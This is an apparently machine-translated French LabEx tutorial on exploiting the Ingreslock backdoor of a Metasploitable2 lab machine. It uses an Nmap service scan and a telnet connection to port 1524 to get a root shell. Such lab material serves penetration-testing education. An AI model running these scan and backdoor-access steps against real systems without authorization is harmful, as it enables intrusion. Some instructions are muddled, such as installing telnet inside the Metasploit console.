Exploiter la vulnérabilité Ingreslock avec Nmap

NmapNmapBeginner
Pratiquer maintenant

💡 Ce tutoriel est traduit par l'IA à partir de la version anglaise. Pour voir la version originale, vous pouvez cliquer ici

Introduction

Dans ce laboratoire, vous apprendrez à exploiter la vulnérabilité du service Ingreslock pour obtenir un accès root à une machine cible. L'environnement de laboratoire est basé sur les machines virtuelles Kali et Metasploitable2 fournies par LabEx. L'objectif de ce laboratoire est de comprendre la vulnérabilité Ingreslock, effectuer un scan de pénétration à l'aide de Nmap et, finalement, obtenir un accès root à la machine Metasploitable2 en exploitant la porte dérobée Ingreslock.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL nmap(("Nmap")) -.-> nmap/NmapGroup(["Nmap"]) wireshark(("Wireshark")) -.-> wireshark/WiresharkGroup(["Wireshark"]) nmap/NmapGroup -.-> nmap/port_scanning("Port Scanning Methods") nmap/NmapGroup -.-> nmap/host_discovery("Host Discovery Techniques") nmap/NmapGroup -.-> nmap/target_specification("Target Specification") nmap/NmapGroup -.-> nmap/timing_performance("Timing and Performance") nmap/NmapGroup -.-> nmap/service_detection("Service Detection") wireshark/WiresharkGroup -.-> wireshark/packet_capture("Packet Capture") subgraph Lab Skills nmap/port_scanning -.-> lab-416124{{"Exploiter la vulnérabilité Ingreslock avec Nmap"}} nmap/host_discovery -.-> lab-416124{{"Exploiter la vulnérabilité Ingreslock avec Nmap"}} nmap/target_specification -.-> lab-416124{{"Exploiter la vulnérabilité Ingreslock avec Nmap"}} nmap/timing_performance -.-> lab-416124{{"Exploiter la vulnérabilité Ingreslock avec Nmap"}} nmap/service_detection -.-> lab-416124{{"Exploiter la vulnérabilité Ingreslock avec Nmap"}} wireshark/packet_capture -.-> lab-416124{{"Exploiter la vulnérabilité Ingreslock avec Nmap"}} end

Comprendre la vulnérabilité Ingreslock et configurer l'environnement

La vulnérabilité Ingreslock est une faille de sécurité ancienne mais toujours pertinente liée au système de gestion de base de données (SGBD) Ingres. Le port TCP 1524 est souvent utilisé par les attaquants comme port de porte dérobée pour maintenir l'accès aux systèmes compromis.

Dans cette étape, vous apprendrez à connaître la vulnérabilité Ingreslock et ses implications.

La vulnérabilité Ingreslock découle du fait que le port TCP 1524 était couramment utilisé comme port d'écoute de porte dérobée par les attaquants après avoir compromis avec succès un système. La simplicité d'exploitation de cette vulnérabilité réside dans la capacité à obtenir un accès au niveau root à la machine cible en simplement se connectant au port ouvert.

Bien que cette vulnérabilité soit considérée comme ancienne, elle est toujours présente dans certains systèmes hérités, ce qui vaut la peine de la comprendre et de l'explorer dans un environnement contrôlé.

  1. Ouvrez un terminal xfce sur la machine hôte LabEx et démarrez la machine cible Metasploitable2 en exécutant la commande suivante :
sudo virsh start Metasploitable2

Attendez que la machine cible démarre, cela peut prendre de 1 à 3 minutes.

  1. Testez la connectivité à la machine cible en l'envoyant des paquets ICMP (ping) :
ping 192.168.122.102

Appuyez sur Ctrl+C pour arrêter le ping.

  1. Lancez le conteneur Kali Linux et entrez dans l'environnement bash en exécutant :
docker run -ti --network host b5b709a49cd5 bash
  1. À l'intérieur du conteneur Kali, testez la connexion réseau à la machine cible :
ping 192.168.122.102

Appuyez sur Ctrl+C pour arrêter le ping.

Effectuer un scan de pénétration

Dans cette étape, vous effectuerez un scan de pénétration sur la machine cible Metasploitable2 en utilisant Nmap pour identifier les ports ouverts et les services en cours d'exécution sur la cible.

  1. Démarrez la machine virtuelle Metasploitable2 et assurez-vous qu'elle est en cours d'exécution.
  2. Lancez le conteneur Kali et entrez dans le shell bash.
  3. À l'intérieur du conteneur Kali, exécutez la commande suivante pour effectuer un scan complet sur la machine cible :
nmap -sV -T4 target-ip-address

L'option -sV indique à Nmap de scanner les ports ouverts pour déterminer les informations sur le service/la version, tandis que -T4 définit le modèle de temporisation à un niveau agressif (les valeurs plus élevées de 0 à 5 augmentent l'agressivité).

Démarrez le service PostgreSQL et initialisez la base de données Metasploit :

cd ~
service postgresql start
msfdb init

Lancez la console Metasploit :

msfconsole

Effectuez un scan complet sur la machine cible :

nmap -sV -T4 192.168.122.102

Voici un exemple de sortie que vous pourriez voir :

[*] exec: nmap -sV -T4 192.168.122.102

Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-24 20:47 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0037s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec?
513/tcp  open  login
514/tcp  open  shell?

...

Cette série de commandes démarre le service PostgreSQL, initialise la base de données Metasploit, lance la console Metasploit, puis effectue un scan complet sur la machine cible en utilisant Nmap.

Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection

Exploiter la porte dérobée Ingreslock

Dans cette étape, vous allez exploiter la vulnérabilité de la porte dérobée Ingreslock pour obtenir un accès root à la machine cible Metasploitable2.

  1. Tout d'abord, si vous n'êtes pas dans la console Metasploit, vous devriez démarrer la console Metasploit :
cd ~
msfconsole
  1. Installez le paquet telnet dans la console Metasploit :
apt-key del ED444FF07D8D0BF6 && apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ED444FF07D8D0BF6 && apt update && apt install telnet
  1. Utilisez la commande telnet pour vous connecter au port de la porte dérobée Ingreslock sur la machine cible :
telnet 192.168.122.102 1524

Si la connexion réussit, vous devriez obtenir un accès root à la machine cible.

  1. Maintenant, vous devez vérifier que l'exploitation de la porte dérobée Ingreslock a réussi en vérifiant l'adresse IP, le nom d'hôte et l'utilisateur actuel sur la machine compromise. Après vous être connecté à la machine cible via la porte dérobée Ingreslock, exécutez les commandes suivantes :

Vérifiez l'adresse IP de la machine compromise :

ifconfig

Vérifiez le nom d'hôte de la machine compromise :

hostname

Vérifiez l'utilisateur actuel sur la machine compromise :

whoami

Si l'exploitation a réussi, vous devriez voir l'adresse IP, le nom d'hôte et l'utilisateur actuel affiché comme root sur la machine cible.

Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection

Résumé

Dans ce laboratoire, vous avez appris à connaître la vulnérabilité Ingreslock, qui permettait aux attaquants d'obtenir un accès root aux systèmes compromis en se connectant au port TCP 1524. Vous avez effectué un scan de pénétration à l'aide de Nmap pour identifier les ports ouverts et les services sur la machine cible. Après avoir détecté le port de la porte dérobée Ingreslock, vous avez exploité la vulnérabilité en utilisant la commande telnet pour obtenir un accès root. Enfin, vous avez vérifié le succès de l'exploitation en vérifiant l'adresse IP, le nom d'hôte et l'utilisateur actuel sur la machine compromise. Ce laboratoire a offert une expérience pratique dans la compréhension et l'exploitation d'une vulnérabilité réelle, mettant en évidence l'importance des correctifs de sécurité et du durcissement des systèmes contre de telles portes dérobées.